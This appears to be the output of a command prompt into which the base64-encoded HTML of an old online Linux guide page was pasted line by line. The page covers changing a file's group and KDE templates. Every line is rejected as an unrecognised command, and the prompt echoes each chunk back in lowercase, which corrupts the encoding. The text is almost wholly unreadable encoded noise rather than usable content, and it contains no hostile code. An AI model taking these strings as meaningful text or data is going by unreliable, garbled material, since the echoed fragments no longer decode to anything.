recognized. >>>> bnRlcnByaXNlbWFuYWdlbWVudDEuaHRtbCI+RW50ZXJwcmlzZSBNZ3QKCQkJPG9wdGlvbiB2 **** Command 'bnrlcnbyaxnlbwfuywdlbwvuddeuahrtbci+rw50zxjwcmlzzsbnz3qkcqkjpg9wdglvbib2' not recognized. >>>> YWx1ZT0iLi4vLi4vLi4vLi4vcmVmZXJlbmNlL2Rpci5mdW5hbmRnYW1lczEuaHRtbCI+RnVu **** Command 'ywx1zt0ili4vli4vli4vli4vcmvmzxjlbmnll2rpci5mdw5hbmrnyw1lczeuahrtbci+rnvu' not recognized. >>>> L0dhbWVzCgkJCTxvcHRpb24gdmFsdWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5jZS9kaXIuZ3Jv **** Command 'l0dhbwvzcgkjctxvchrpb24gdmfsdwu9ii4uly4uly4uly4ul3jlzmvyzw5jzs9kaxiuz3jv' not recognized. >>>> dXB3YXJlYW5kY29sbGFib3JhdGlvbjEuaHRtbCI+R3JvdXB3YXJlCgkJCTxvcHRpb24gdmFs **** Command 'dxb3yxjlyw5ky29sbgfib3jhdglvbjeuahrtbci+r3jvdxb3yxjlcgkjctxvchrpb24gdmfs' not recognized. >>>> dWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5jZS9kaXIuaGFyZHdhcmUxLmh0bWwiPkhhcmR3YXJl **** Command 'dwu9ii4uly4uly4uly4ul3jlzmvyzw5jzs9kaxiuagfyzhdhcmuxlmh0bwwipkhhcmr3yxjl' not recognized. >>>> CgkJCTxvcHRpb24gdmFsdWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5jZS9kaXIuaWJtcmVkYm9v **** Command 'cgkjctxvchrpb24gdmfsdwu9ii4uly4uly4uly4ul3jlzmvyzw5jzs9kaxiuawjtcmvkym9v' not recognized. >>>> a3MxLmh0bWwiPklCTSBSZWRib29rcwoJCQk8b3B0aW9uIHZhbHVlPSIuLi8uLi8uLi8uLi9y **** Command 'a3mxlmh0bwwipklctsbszwrib29rcwojcqk8b3b0aw9uihzhbhvlpsiuli8uli8uli8uli9y' not recognized. >>>> ZWZlcmVuY2UvZGlyLmludHJhbmV0YW5kZXh0cmFuZXRkZXZlbG9wbWVudDEuaHRtbCI+SW50 **** Command 'zwzlcmvuy2uvzglylmludhjhbmv0yw5kzxh0cmfuzxrkzxzlbg9wbwvuddeuahrtbci+sw50' not recognized. >>>> cmFuZXQgRGV2CgkJCTxvcHRpb24gdmFsdWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5jZS9kaXIu **** Command 'cmfuzxqgrgv2cgkjctxvchrpb24gdmfsdwu9ii4uly4uly4uly4ul3jlzmvyzw5jzs9kaxiu' not recognized. >>>> bWlkZGxld2FyZS5odG1sIj5NaWRkbGV3YXJlCgkJCTxvcHRpb24gdmFsdWU9Ii4uLy4uLy4u **** Command 'bwlkzgxld2fyzs5odg1sij5nawrkbgv3yxjlcgkjctxvchrpb24gdmfsdwu9ii4uly4uly4u' not recognized. >>>> Ly4uL3JlZmVyZW5jZS9kaXIubXVsdGltZWRpYWFuZGdyYXBoaWNkZXNpZ24xLmh0bWwiPk11 **** Command 'ly4ul3jlzmvyzw5jzs9kaxiubxvsdgltzwrpywfuzgdyyxboawnkzxnpz24xlmh0bwwipk11' not recognized. >>>> bHRpbWVkaWEKCQkJPG9wdGlvbiB2YWx1ZT0iLi4vLi4vLi4vLi4vcmVmZXJlbmNlL2Rpci5u **** Command 'bhrpbwvkawekcqkjpg9wdglvbib2ywx1zt0ili4vli4vli4vli4vcmvmzxjlbmnll2rpci5u' not recognized. >>>> ZXR3b3Jrc2VydmljZXMxLmh0bWwiPk5ldHdvcmtzIAoJCQk8b3B0aW9uIHZhbHVlPSIuLi8u **** Command 'zxr3b3jrc2vydmljzxmxlmh0bwwipk5ldhdvcmtziaojcqk8b3b0aw9uihzhbhvlpsiuli8u' not recognized. >>>> Li8uLi8uLi9yZWZlcmVuY2UvZGlyLm9wZXJhdGluZ3N5c3RlbXMuaHRtbCI+T1MKCQkJPG9w **** Command 'li8uli8uli9yzwzlcmvuy2uvzglylm9wzxjhdgluz3n5c3rlbxmuahrtbci+t1mkcqkjpg9w' not recognized. >>>> dGlvbiB2YWx1ZT0iLi4vLi4vLi4vLi4vcmVmZXJlbmNlL2Rpci5wcm9kdWN0aXZpdHlhcHBs **** Command 'dglvbib2ywx1zt0ili4vli4vli4vli4vcmvmzxjlbmnll2rpci5wcm9kdwn0axzpdhlhchbs' not recognized. >>>> aWNhdGlvbnMxLmh0bWwiPlByb2QgQXBwcwoJCQk8b3B0aW9uIHZhbHVlPSIuLi8uLi8uLi8u **** Command 'awnhdglvbnmxlmh0bwwiplbyb2qgqxbwcwojcqk8b3b0aw9uihzhbhvlpsiuli8uli8uli8u' not recognized. >>>> Li9yZWZlcmVuY2UvZGlyLnByb2dyYW1taW5nbGFuZ3VhZ2VzLmh0bWwiPlByb2dyYW1taW5n **** Command 'li9yzwzlcmvuy2uvzglylnbyb2dyyw1taw5nbgfuz3vhz2vzlmh0bwwiplbyb2dyyw1taw5n' not recognized. >>>> CgkJCTxvcHRpb24gdmFsdWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5jZS9kaXIuc2VjdXJpdHkx **** Command 'cgkjctxvchrpb24gdmfsdwu9ii4uly4uly4uly4ul3jlzmvyzw5jzs9kaxiuc2vjdxjpdhkx' not recognized. >>>> Lmh0bWwiPlNlY3VyaXR5CQoJCQk8IS0tIDxvcHRpb24gdmFsdWU9Ii9yZWZlcmVuY2UvZGly **** Command 'lmh0bwwiplnly3vyaxr5cqojcqk8is0tidxvchrpb24gdmfsdwu9ii9yzwzlcmvuy2uvzgly' not recognized. >>>> LmV3dHJhaW5pbmcxLmh0bWwiPlRyYWluaW5nIEd1aWRlcyAtLT4KCQkJPG9wdGlvbiB2YWx1 **** Command 'lmv3dhjhaw5pbmcxlmh0bwwiplryywluaw5nied1awrlcyatlt4kcqkjpg9wdglvbib2ywx1' not recognized. >>>> ZT0iLi4vLi4vLi4vLi4vcmVmZXJlbmNlL2Rpci51c2VyaW50ZXJmYWNlcy5odG1sIj5VSQoJ **** Command 'zt0ili4vli4vli4vli4vcmvmzxjlbmnll2rpci51c2vyaw50zxjmywnlcy5odg1sij5vsqoj' not recognized. >>>> CQk8b3B0aW9uIHZhbHVlPSIuLi8uLi8uLi8uLi9yZWZlcmVuY2UvZGlyLndlYnNlcnZpY2Vz **** Command 'cqk8b3b0aw9uihzhbhvlpsiuli8uli8uli8uli9yzwzlcmvuy2uvzglylndlynnlcnzpy2vz' not recognized. >>>> Lmh0bWwiPldlYiBTZXJ2aWNlcwoJCQk8b3B0aW9uIHZhbHVlPSIuLi8uLi8uLi8uLi9yZWZl **** Command 'lmh0bwwipldlyibtzxj2awnlcwojcqk8b3b0aw9uihzhbhvlpsiuli8uli8uli8uli9yzwzl' not recognized. >>>> cmVuY2UvZGlyLndlYm1hc3RlcnNraWxsczEuaHRtbCI+V2VibWFzdGVyCgkJCTxvcHRpb24g **** Command 'cmvuy2uvzglylndlym1hc3rlcnnrawxsczeuahrtbci+v2vibwfzdgvycgkjctxvchrpb24g' not recognized. >>>> dmFsdWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5jZS9kaXIueTJrMS5odG1sIj5ZMksKCQkJPG9w **** Command 'dmfsdwu9ii4uly4uly4uly4ul3jlzmvyzw5jzs9kaxiuetjrms5odg1sij5zmkskcqkjpg9w' not recognized. >>>> dGlvbiB2YWx1ZT0iIj4tLS0tLS0tLS0tLQoJCQk8b3B0aW9uIHZhbHVlPSIuLi8uLi8uLi8u **** Command 'dglvbib2ywx1zt0iij4tls0tls0tls0tlqojcqk8b3b0aw9uihzhbhvlpsiuli8uli8uli8u' not recognized. >>>> Li9yZWZlcmVuY2Uvd2hhdHNuZXcuaHRtbCI+TmV3IFRpdGxlcwoJCQk8b3B0aW9uIHZhbHVl **** Command 'li9yzwzlcmvuy2uvd2hhdhnuzxcuahrtbci+tmv3ifrpdgxlcwojcqk8b3b0aw9uihzhbhvl' not recognized. >>>> PSIiPi0tLS0tLS0tLS0tCgkJCTxvcHRpb24gdmFsdWU9Ii4uLy4uLy4uLy4uL3JlZmVyZW5j **** Command 'psiipi0tls0tls0tls0tcgkjctxvchrpb24gdmfsdwu9ii4uly4uly4uly4ul3jlzmvyzw5j' not recognized. >>>> ZS9kaXIuYXJjaGl2ZTEuaHRtbCI+RnJlZSBBcmNoaXZlCQkKCQkJPC9TRUxFQ1Q+CgkJCTwv **** Command 'zs9kaxiuyxjjagl2zteuahrtbci+rnjlzsbbcmnoaxzlcqkkcqkjpc9truxfq1q+cgkjctwv' not recognized. >>>> Zm9udD48L3RkPgoJPC90cj4KCTwvdGFibGU+Cgk8L2Zvcm0+CjwhLS0gTEVGVCBOQVYgU0VB **** Command 'zm9udd48l3rkpgojpc90cj4kctwvdgfibgu+cgk8l2zvcm0+cjwhls0gtevgvcboqvygu0vb' not recognized. >>>> UkNIIEVORCAtLT4KCgkJPC90ZD4KCQkKPCEtLSBQVUIgUEFSVE5FUlMgRU5EIC0tPgo8IS0t **** Command 'ukniievorcatlt4kcgkjpc90zd4kcqkkpcetlsbqvuiguefsve5fulmgru5eic0tpgo8is0t' not recognized. >>>> IEVORCBMRUZUIE5BViAtLT4KCjx0ZCByb3dzcGFuPSI4IiBhbGlnbj0icmlnaHQiIHZhbGln **** Command 'ievorcbmruzuie5bviatlt4kcjx0zcbyb3dzcgfupsi4iibhbglnbj0icmlnahqiihzhbgln' not recognized. >>>> bj0idG9wIj48aW1nIHNyYz0iLi4vLi4vLi4vLi4vaW1hZ2VzL2lzd2Jscy5naWYiIHdpZHRo **** Command 'bj0idg9wij48aw1nihnyyz0ili4vli4vli4vli4vaw1hz2vzl2lzd2jscy5nawyiihdpzhro' not recognized. >>>> PTEgaGVpZ2h0PTQwMCBhbHQ9IiIgYm9yZGVyPSIwIj48L3RkPgo8dGQ+PGltZyBzcmM9Ii4u **** Command 'ptegagvpz2h0ptqwmcbhbhq9iiigym9yzgvypsiwij48l3rkpgo8dgq+pgltzybzcmm9ii4u' not recognized. >>>> Ly4uLy4uLy4uL2ltYWdlcy93aGl0ZS5naWYiIHdpZHRoPSI1IiBoZWlnaHQ9IjEiIGFsdD0i **** Command 'ly4uly4uly4ul2ltywdlcy93agl0zs5nawyiihdpzhropsi1iibozwlnahq9ijeiigfsdd0i' not recognized. >>>> IiBib3JkZXI9IjAiPjwvdGQ+CjwhLS0gZW5kIG9mIElUSyBsZWZ0IE5BViAtLT4KCjwhLS0g **** Command 'iibib3jkzxi9ijaipjwvdgq+cjwhls0gzw5kig9mielusybszwz0ie5bviatlt4kcjwhls0g' not recognized. >>>> YmVnaW4gbWFpbiBjb250ZW50IC0tPgo8dGQgd2lkdGg9IjEwMCUiIHZhbGlnbj0idG9wIiBh **** Command 'ymvnaw4gbwfpbibjb250zw50ic0tpgo8dgqgd2lkdgg9ijewmcuiihzhbglnbj0idg9wiibh' not recognized. >>>> bGlnbj0ibGVmdCI+CgoKPCEtLSBFTkQgU1VCIEhFQURFUiAtLT4KCgoKPCEtLUJlZ2luIENv **** Command 'bglnbj0ibgvmdci+cgokpcetlsbftkqgu1vciehfqurfuiatlt4kcgokpcetlujlz2luienv' not recognized. >>>> bnRlbnQgQ29sdW1uIC0tPgoKPEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIiBTSVpFPSIt **** Command 'bnrlbnqgq29sdw1uic0tpgokpezptlqgrkfdrt0iqxjpywwssgvsdmv0awnhiibtsvpfpsit' not recognized. >>>> MSI+ClRvIGFjY2VzcyB0aGUgY29udGVudHMsIGNsaWNrIHRoZSBjaGFwdGVyIGFuZCBzZWN0 **** Command 'msi+clrvigfjy2vzcyb0agugy29udgvudhmsignsawnrihrozsbjagfwdgvyigfuzcbzzwn0' not recognized. >>>> aW9uIHRpdGxlcy4KPC9GT05UPgo8UD4KPEI+Q29tcGxldGUgSWRpb3QncyBHdWlkZSB0byBM **** Command 'aw9uihrpdgxlcy4kpc9gt05upgo8ud4kpei+q29tcgxldgugswrpb3qncybhdwlkzsb0bybm' not recognized. >>>> aW51eDwvQj4KPEZPTlQgU0laRT0iLTEiPgo8QlI+CjxJPihQdWJsaXNoZXI6IE1hY21pbGxh **** Command 'aw51edwvqj4kpezptlqgu0lart0ilteipgo8qli+cjxjpihqdwjsaxnozxi6ie1hy21pbgxh' not recognized. >>>> biBDb21wdXRlciBQdWJsaXNoaW5nKTwvST4KPEJSPgpBdXRob3Iocyk6IE1hbnVlbCBSaWNh **** Command 'bibdb21wdxrlcibqdwjsaxnoaw5nktwvst4kpejspgpbdxrob3iocyk6ie1hbnvlbcbsawnh' not recognized. >>>> cnQKPEJSPgpJU0JOOiAwNzg5NzE4MjZ4CjxCUj4KUHVibGljYXRpb24gRGF0ZTogMTIvMjIv **** Command 'cnqkpejspgpju0jooiawnzg5nze4mjz4cjxcuj4kuhvibgljyxrpb24grgf0ztogmtivmjiv' not recognized. >>>> OTgKPC9GT05UPgo8UD4KPFNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+CmZ1bmN0aW9u **** Command 'otgkpc9gt05upgo8ud4kpfnjcmlwdcbsyw5ndwfnzt0ismf2yvnjcmlwdci+cmz1bmn0aw9u' not recognized. >>>> IGlzSUU0KCkgCnsKICAgIHJldHVybiggbmF2aWdhdG9yLmFwcE5hbWUuaW5kZXhPZigiTWlj **** Command 'iglzsuu0kckgcnskicagihjldhvybiggbmf2awdhdg9ylmfwce5hbwuuaw5kzxhpzigitwlj' not recognized. >>>> cm9zb2Z0IikgIT0gLTEgJiYgKG5hdmlnYXRvci5hcHBWZXJzaW9uLmNoYXJBdCgwKT09JzQn **** Command 'cm9zb2z0iikgit0gltegjiygkg5hdmlnyxrvci5hchbwzxjzaw9ulmnoyxjbdcgwkt09jzqn' not recognized. >>>> KSApOwogfQpmdW5jdGlvbiBib29rTWFya2l0KCkKewogICAgICAgIHZhciB1cmw9Ii4uLy4u **** Command 'ksapowogfqpmdw5jdglvbibib29rtwfya2l0kckkewogicagicagihzhcib1cmw9ii4uly4u' not recognized. >>>> Ly4uLy4uLy4uL3d3dy5pdGtub3dsZWRnZS5jb20vUFNVc2VyL0VXQm9va01hcmtzLmh0bWxA **** Command 'ly4uly4uly4ul3d3dy5pdgtub3dszwrnzs5jb20vufnvc2vyl0vxqm9va01hcmtzlmh0bwxa' not recognized. >>>> dXJsPSIrd2luZG93LmxvY2F0aW9uKyImaXNibj0wIjsKCXBhcmVudC5sb2NhdGlvbi5ocmVm **** Command 'dxjspsird2luzg93lmxvy2f0aw9ukyimaxnibj0wijskcxbhcmvudc5sb2nhdglvbi5ocmvm' not recognized. >>>> PXVybDsKICAgICAgICAvL3ZhciB3aW4gPSB3aW5kb3cub3Blbih1cmwsIm15aXRrIik7CiAg **** Command 'pxvybdskicagicagicavl3zhcib3aw4gpsb3aw5kb3cub3blbih1cmwsim15axrriik7ciag' not recognized. >>>> ICAgICAgLy9pZighaXNJRTQoKSkKICAgICAgICAvLyAgICAgICB3aW4uZm9jdXMoKTsKCn0K **** Command 'icagicagly9pzighaxnjrtqokskkicagicagicavlyagicagicb3aw4uzm9jdxmoktskcn0k' not recognized. >>>> PC9TY3JpcHQ+CjxhIGhyZWY9ImphdmFzY3JpcHQ6Ym9va01hcmtpdCgpOyI+PGltZyBzcmM9 **** Command 'pc9ty3jpchq+cjxhighyzwy9imphdmfzy3jpchq6ym9va01hcmtpdcgpoyi+pgltzybzcmm9' not recognized. >>>> Ii4uLy4uLy4uLy4uL2ltYWdlcy9ib29rbWFya2l0LmdpZiIgYm9yZGVyPTAgYWx0PSJCb29r **** Command 'ii4uly4uly4uly4ul2ltywdlcy9ib29rbwfya2l0lmdpziigym9yzgvyptagywx0psjcb29r' not recognized. >>>> bWFyayBJdCIgd2lkdGg9OTcgaGVpZ2h0PTIzPjwvYT4KCjxQPgo8Zm9ybSBuYW1lPSJTZWFy **** Command 'bwfyaybjdcigd2lkdgg9otcgagvpz2h0ptizpjwvyt4kcjxqpgo8zm9ybsbuyw1lpsjtzwfy' not recognized. >>>> Y2giIG1ldGhvZD0iR0VUIiBhY3Rpb249Imh0dHA6Ly9zZWFyY2guZWFydGh3ZWIuY29tL3Nl **** Command 'y2giig1ldghvzd0ir0vuiibhy3rpb249imh0dha6ly9zzwfyy2guzwfydgh3zwiuy29tl3nl' not recognized. >>>> YXJjaDk3L3NlYXJjaF9yZWRpci5jZ2kiPgoKPElOUFVUIFRZUEU9ImhpZGRlbiIgTkFNRT0i **** Command 'yxjjadk3l3nlyxjjaf9yzwrpci5jz2kipgokpeloufvuifrzueu9imhpzgrlbiigtkfnrt0i' not recognized. >>>> QWN0aW9uIiBWQUxVRT0iU2VhcmNoIj4KPElOUFVUIFRZUEU9ImhpZGRlbiIgTkFNRT0iU2Vh **** Command 'qwn0aw9uiibwquxvrt0iu2vhcmnoij4kpeloufvuifrzueu9imhpzgrlbiigtkfnrt0iu2vh' not recognized. >>>> cmNoUGFnZSIgVkFMVUU9Imh0dHA6Ly9zZWFyY2guZWFydGh3ZWIuY29tL3NlYXJjaDk3L3Nh **** Command 'cmnougfnzsigvkfmvuu9imh0dha6ly9zzwfyy2guzwfydgh3zwiuy29tl3nlyxjjadk3l3nh' not recognized. >>>> bXBsZXMvZm9ybXMvc3JjaGRlbW8uaHRtIj4KPElOUFVUIFRZUEU9ImhpZGRlbiIgTkFNRT0i **** Command 'bxbszxmvzm9ybxmvc3jjagrlbw8uahrtij4kpeloufvuifrzueu9imhpzgrlbiigtkfnrt0i' not recognized. >>>> Q29sbGVjdGlvbiIgVkFMVUU9IklUSyI+CjxJTlBVVCBUWVBFPSJoaWRkZW4iIE5BTUU9IlJl **** Command 'q29sbgvjdglvbiigvkfmvuu9iklusyi+cjxjtlbvvcbuwvbfpsjoawrkzw4iie5btuu9iljl' not recognized. >>>> c3VsdFRlbXBsYXRlIiBWQUxVRT0iaXRrLXNpbXBsZS1pbnRyYWJvb2suaHRzIj4KPElOUFVU **** Command 'c3vsdfrlbxbsyxrliibwquxvrt0iaxrrlxnpbxbszs1pbnryywjvb2suahrzij4kpeloufvu' not recognized. >>>> IFRZUEU9ImhpZGRlbiIgTkFNRT0iVmlld1RlbXBsYXRlIiBWQUxVRT0idmlldy5odHMiPgoK **** Command 'ifrzueu9imhpzgrlbiigtkfnrt0ivmlld1rlbxbsyxrliibwquxvrt0idmlldy5odhmipgok' not recognized. >>>> PGZvbnQgZmFjZT0iYXJpYWwsIGhlbHZldGljYSIgc2l6ZT0yPjxiPlNlYXJjaCB0aGlzIGJv **** Command 'pgzvbnqgzmfjzt0iyxjpywwsighlbhzldgljysigc2l6zt0ypjxiplnlyxjjacb0aglzigjv' not recognized. >>>> b2s6PC9iPjwvZm9udD48YnI+CjxJTlBVVCBOQU1FPSJxdWVyeVRleHQiIHNpemU9NTAgVkFM **** Command 'b2s6pc9ipjwvzm9udd48yni+cjxjtlbvvcboqu1fpsjxdwvyevrlehqiihnpemu9ntagvkfm' not recognized. >>>> VUU9IiI+Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0YnV0dG9uIiB2 **** Command 'vuu9iii+jm5ic3a7pgluchv0ihr5cgu9inn1ym1pdcigbmftzt0ic3vibwl0ynv0dg9uiib2' not recognized. >>>> YWx1ZT0iR28hIj4KPElOUFVUIHR5cGU9aGlkZGVuIE5BTUU9InNlY3Rpb25fb24iIFZBTFVF **** Command 'ywx1zt0ir28hij4kpeloufvuihr5cgu9aglkzgvuie5btuu9innly3rpb25fb24iifzbtfvf' not recognized. >>>> PSJvbiI+CjxJTlBVVCB0eXBlPWhpZGRlbiBOQU1FPSJzZWN0aW9uIiBWQUxVRT0iaHR0cDov **** Command 'psjvbii+cjxjtlbvvcb0exblpwhpzgrlbiboqu1fpsjzzwn0aw9uiibwquxvrt0iahr0cdov' not recognized. >>>> L3d3dy5pdGtub3dsZWRnZS5jb20vcmVmZXJlbmNlL3N0YW5kYXJkLzA3ODk3MTgyNngvIj4K **** Command 'l3d3dy5pdgtub3dszwrnzs5jb20vcmvmzxjlbmnll3n0yw5kyxjklza3odk3mtgynngvij4k' not recognized. >>>> CjwvZm9ybT4KCgo8IS0tIEVtcHR5IFJlZmVyZW5jZSBTdWJoZWFkIC0tPgoKPCEtLUlTQk49 **** Command 'cjwvzm9ybt4kcgo8is0tievtchr5ifjlzmvyzw5jzsbtdwjozwfkic0tpgokpcetlultqk49' not recognized. >>>> MDc4OTcxODI2eC8vLS0+CjwhLS1USVRMRT1Db21wbGV0ZSBJZGlvdCdzIEd1aWRlIHRvIExp **** Command 'mdc4otcxodi2ec8vls0+cjwhls1usvrmrt1db21wbgv0zsbjzglvdcdzied1awrlihrviexp' not recognized. >>>> bnV4Ly8tLT4KPCEtLUFVVEhPUj1EZWJiaWUgV2Fsa293c2tpLy8tLT4KPCEtLVBVQkxJU0hF **** Command 'bnv4ly8tlt4kpcetlufvvehpuj1ezwjiawugv2fsa293c2tply8tlt4kpcetlvbvqkxju0hf' not recognized. >>>> Uj1NYWNtaWxsYW4gQ29tcHV0ZXIgUHVibGlzaGluZy8vLS0+CjwhLS1JTVBSSU5UPVF1ZS8v **** Command 'uj1nywntawxsyw4gq29tchv0zxiguhvibglzagluzy8vls0+cjwhls1jtvbssu5upvf1zs8v' not recognized. >>>> LS0+CjwhLS1DSEFQVEVSPTYvLy0tPgo8IS0tUEFHRVM9MDY2LTA2OC8vLS0+CjwhLS1VTkFT **** Command 'ls0+cjwhls1dsefqvevsptyvly0tpgo8is0tuefhrvm9mdy2lta2oc8vls0+cjwhls1vtkft' not recognized. >>>> U0lHTkVEMS8vLS0+CjwhLS1VTkFTU0lHTkVEMi8vLS0+Cgo8Q0VOVEVSPgo8VEFCTEUgQk9S **** Command 'u0lhtkvems8vls0+cjwhls1vtkftu0lhtkvemi8vls0+cgo8q0vovevspgo8vefcteugqk9s' not recognized. >>>> REVSPgo8VFI+CjxURD48QSBIUkVGPSIwNjMtMDY3Lmh0bWwiPlByZXZpb3VzPC9BPjwvVEQ+ **** Command 'revspgo8vfi+cjxurd48qsbiukvgpsiwnjmtmdy3lmh0bwwiplbyzxzpb3vzpc9bpjwvveq+' not recognized. >>>> CjxURD48QSBIUkVGPSIuLi9ld3RvYy5odG1sIj5UYWJsZSBvZiBDb250ZW50czwvQT48L1RE **** Command 'cjxurd48qsbiukvgpsiuli9ld3rvyy5odg1sij5uywjszsbvzibdb250zw50czwvqt48l1re' not recognized. >>>> Pgo8VEQ+PEEgSFJFRj0iLi4vY2gwNy8wNjktMDcyLmh0bWwiPk5leHQ8L0E+PC9URD4KPC9U **** Command 'pgo8veq+peegsfjfrj0ili4vy2gwny8wnjktmdcylmh0bwwipk5lehq8l0e+pc9urd4kpc9u' not recognized. >>>> Uj4KPC9UQUJMRT4KPC9DRU5URVI+CjxQPjxCUj48L1A+CjxIMz48QSBOQU1FPSJIZWFkaW5n **** Command 'uj4kpc9uqujmrt4kpc9dru5urvi+cjxqpjxcuj48l1a+cjximz48qsboqu1fpsjizwfkaw5n' not recognized. >>>> MTYiPjwvQT48Rk9OVCBDT0xPUj0iIzAwMDA3NyI+Q2hhbmdpbmcgdGhlIEdyb3VwIG9mIGEg **** Command 'mtyipjwvqt48rk9ovcbdt0xpuj0iizawmda3nyi+q2hhbmdpbmcgdghliedyb3vwig9migeg' not recognized. >>>> RmlsZSBvciBGb2xkZXI8L0ZPTlQ+PC9IMz4KPFA+SWYgeW91IGFyZSBjb2xsYWJvcmF0aW5n **** Command 'rmlszsbvcibgb2xkzxi8l0zptlq+pc9imz4kpfa+swygew91igfyzsbjb2xsywjvcmf0aw5n' not recognized. >>>> IG9uIGEgcHJvamVjdCB3aXRoIGEgZ3JvdXAgb2Ygb3RoZXIgdXNlcnMsIHlvdSBtaWdodCB3 **** Command 'ig9uigegchjvamvjdcb3axroigegz3jvdxagb2ygb3rozxigdxnlcnmsihlvdsbtawdodcb3' not recognized. >>>> YW50IHRvIGdyYW50IHRoZW0gYWNjZXNzIHRvIGEgc2V0IG9mIGZpbGVzIGFuZCBmb2xkZXJz **** Command 'yw50ihrvigdyyw50ihrozw0gywnjzxnzihrvigegc2v0ig9migzpbgvzigfuzcbmb2xkzxjz' not recognized. >>>> LiBXaGVuIHlvdSBjcmVhdGUgZmlsZXMgb3IgZm9sZGVycywgdGhleSB3aWxsIGJlIGF1dG9t **** Command 'libxagvuihlvdsbjcmvhdgugzmlszxmgb3igzm9szgvycywgdghlesb3awxsigjligf1dg9t' not recognized. >>>> YXRpY2FsbHkgYXNzaWduZWQgdG8geW91ciBkZWZhdWx0IGdyb3VwLiBJZiB5b3UgYXJlIGEg **** Command 'yxrpy2fsbhkgyxnzawduzwqgdg8gew91cibkzwzhdwx0igdyb3vwlibjzib5b3ugyxjligeg' not recognized. >>>> bWVtYmVyIG9mIG90aGVyIGdyb3VwcywgeW91IGFyZSBhYmxlIHRvIHJlYXNzaWduIGFjY2Vz **** Command 'bwvtymvyig9mig90agvyigdyb3vwcywgew91igfyzsbhymxlihrvihjlyxnzawduigfjy2vz' not recognized. >>>> cyBmb3IgYSBkaWZmZXJlbnQgZ3JvdXAgdG8geW91ciBmaWxlcyBhbmQgZm9sZGVycy4KPC9Q **** Command 'cybmb3igysbkawzmzxjlbnqgz3jvdxagdg8gew91cibmawxlcybhbmqgzm9szgvycy4kpc9q' not recognized. >>>> Pgo8UD5UbyBjaGFuZ2UgdGhlIGdyb3VwIG1lbWJlcnNoaXBzIG9uIGEgZmlsZSBvciBmb2xk **** Command 'pgo8ud5ubybjagfuz2ugdghligdyb3vwig1lbwjlcnnoaxbzig9uigegzmlszsbvcibmb2xk' not recognized. >>>> ZXIsIHJpZ2h0LWNsaWNrIGl0IGFuZCBjaG9vc2UgUHJvcGVydGllcyBmcm9tIHRoZSBtZW51 **** Command 'zxisihjpz2h0lwnsawnrigl0igfuzcbjag9vc2uguhjvcgvydgllcybmcm9tihrozsbtzw51' not recognized. >>>> OyB0aGVuIGNob29zZSB0aGUgUGVybWlzc2lvbnMgdGFiIGZyb20gdGhlIHBhbmVsIHRoYXQg **** Command 'oyb0agvuignob29zzsb0agugugvybwlzc2lvbnmgdgfiigzyb20gdghlihbhbmvsihroyxqg' not recognized. >>>> aXMgZGlzcGxheWVkLjwvUD4KPFA+VG8gY2hhbmdlIHRoZSBncm91cCBvZiB0aGUgZmlsZSwg **** Command 'axmgzglzcgxhewvkljwvud4kpfa+vg8gy2hhbmdlihrozsbncm91ccbvzib0agugzmlszswg' not recognized. >>>> Y2xpY2sgb24gdGhlIGdyb3VwIGNob2ljZSBtZW51IHRvIHJldmVhbCB0aGUgZ3JvdXBzIHlv **** Command 'y2xpy2sgb24gdghligdyb3vwignob2ljzsbtzw51ihrvihjldmvhbcb0agugz3jvdxbzihlv' not recognized. >>>> dSBiZWxvbmcgdG8gYW5kIHNlbGVjdCB0aGUgb25lIHlvdSB3YW50IChzZWUgdGhlIG5leHQg **** Command 'dsbizwxvbmcgdg8gyw5kihnlbgvjdcb0agugb25lihlvdsb3yw50ichzzwugdghlig5lehqg' not recognized. >>>> ZmlndXJlKS48L1A+CjxQPjxBIE5BTUU9IkZpZzExIj48L0E+PEEgSFJFRj0iamF2YXNjcmlw **** Command 'zmlndxjlks48l1a+cjxqpjxbie5btuu9ikzpzzexij48l0e+peegsfjfrj0iamf2yxnjcmlw' not recognized. >>>> dDpkaXNwbGF5V2luZG93KCdpbWFnZXMvMDYtMTEuanBnJyw2NDQsNDI5ICkiPjxJTUcgU1JD **** Command 'ddpkaxnwbgf5v2luzg93kcdpbwfnzxmvmdytmteuanbnjyw2ndqsndi5ickipjxjtucgu1jd' not recognized. >>>> PSJpbWFnZXMvMDYtMTF0LmpwZyI+PC9BPjxCUj5JZiB5b3UgYmVsb25nIHRvIG1vcmUgdGhh **** Command 'psjpbwfnzxmvmdytmtf0lmpwzyi+pc9bpjxcuj5jzib5b3ugymvsb25nihrvig1vcmugdghh' not recognized. >>>> biBvbmUgZ3JvdXAgeW91IGNhbiBhc3NpZ24gYSBkaWZmZXJlbnQgZ3JvdXAgdG8geW91ciBm **** Command 'bibvbmugz3jvdxagew91ignhbibhc3npz24gysbkawzmzxjlbnqgz3jvdxagdg8gew91cibm' not recognized. >>>> aWxlcy48L1A+CjxIMz48QSBOQU1FPSJIZWFkaW5nMTciPjwvQT48Rk9OVCBDT0xPUj0iIzAw **** Command 'awxlcy48l1a+cjximz48qsboqu1fpsjizwfkaw5nmtcipjwvqt48rk9ovcbdt0xpuj0iizaw' not recognized. >>>> MDA3NyI+S0RFIFRlbXBsYXRlczwvRk9OVD48L0gzPgo8UD5LREUgcHJvdmlkZXMgYSB1c2Vm **** Command 'mda3nyi+s0rfifrlbxbsyxrlczwvrk9ovd48l0gzpgo8ud5lreugchjvdmlkzxmgysb1c2vm' not recognized. >>>> dWwgZmVhdHVyZTogVGVtcGxhdGVzLiBUZW1wbGF0ZXMgYWxsb3cgeW91IHRvIGNyZWF0ZSBw **** Command 'dwwgzmvhdhvyztogvgvtcgxhdgvzlibuzw1wbgf0zxmgywxsb3cgew91ihrvignyzwf0zsbw' not recognized. >>>> cm90b3R5cGljYWwgZG9jdW1lbnRzIGFuZCBmb2xkZXIgc3RydWN0dXJlcyB0aGF0IHlvdSBj **** Command 'cm90b3r5cgljywwgzg9jdw1lbnrzigfuzcbmb2xkzxigc3rydwn0dxjlcyb0agf0ihlvdsbj' not recognized. >>>> 